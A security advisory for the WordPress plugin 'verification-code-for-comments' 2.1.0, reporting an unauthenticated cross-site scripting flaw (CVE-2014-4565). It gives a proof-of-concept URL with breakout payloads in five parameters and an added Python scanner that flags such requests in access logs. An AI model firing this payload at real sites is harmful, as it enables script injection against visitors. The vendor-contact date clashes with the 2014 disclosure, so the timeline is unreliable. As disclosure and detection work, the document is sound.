wp-plugin : verification-code-for-comments – A3-Cross-Site Scripting (XSS)


Plugin Details


Plugin Name : verification-code-for-comments


Affected Version : 2.1.0 (and most probably lower versions, if any)

Vulnerability : A3-Cross-Site Scripting (XSS)
Identified by : Anant Shrivastava



Technical Details


Minimum Level of Access Required : Unauthenticated


PoC - (Proof of Concept) :


http://localhost/wp-content/plugins/verification-code-for-comments/vcc.js.php?vp=vp’>// &vs=vs’>// &l=l’>// &vu=vu’>// &vm=vm’>// &


Vulnerable Parameters : vp,vs,l,vu,vm
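
A defender's check for this advisory, added here as an example (it is not part of the original advisory or the plugin's code): it scans web access log lines for requests to vcc.js.php in which any of the listed parameters carries quote or angle-bracket characters. The log lines are constructed samples in combined log format, and the function name `suspicious_params` is hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script path and parameter names are taken from the advisory above.
VULN_PATH = "/wp-content/plugins/verification-code-for-comments/vcc.js.php"
VULN_PARAMS = ("vp", "vs", "l", "vu", "vm")
# Characters that let a reflected value leave a quoted or tag context;
# U+2019 is included because the PoC above is rendered with that quote.
BREAKOUT = re.compile("[\"'<>\u2019]")
# Request field of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range), not real traffic.
_PREFIX = '203.0.113.9 - - [12/Jun/2014:10:00:00 +0000] "GET '
SAMPLE_LOG = [
    _PREFIX + VULN_PATH + '?vp=abc&vs=1&l=en HTTP/1.1" 200 512',
    _PREFIX + VULN_PATH + '?vp=vp%27%3E&vs=ok&l=l%27%3E HTTP/1.1" 200 530',
    _PREFIX + '/index.php?vp=%27%3E HTTP/1.1" 200 100',
    _PREFIX + VULN_PATH + '?vm=vm%2527%253E HTTP/1.1" 200 530',
]

def suspicious_params(log_line):
    """Return the advisory's parameters whose value contains breakout characters."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    # endswith() also covers WordPress installed in a subdirectory.
    if not url.path.endswith(VULN_PATH):
        return []
    query = parse_qs(url.query, keep_blank_values=True)
    hits = []
    for name in VULN_PARAMS:
        # parse_qs decodes once; unquote() again to catch double encoding.
        if any(BREAKOUT.search(unquote(v)) for v in query.get(name, [])):
            hits.append(name)
    return hits

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        hits = suspicious_params(line)
        if hits:
            print("ALERT", ",".join(hits), "<-", line.split('"')[1])
```
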


Disclosure Timeline


Vendor Contacted : 2026-01-15

Plugin Status : Closed
Public Disclosure : June 12, 2014
CVE Number : CVE-2014-4565

Plugin Description :
Add a verification code when a user posts a comment to keep robots away. You can use an image verification code or a math equation instead.

Robots may post lots of spam comments into your database. You can add a verification code image or a math equation to avoid this.


* You can choose a verification code image or a math equation as you wish
* You don't need to edit any source code of WP, you just need to activate the plugin
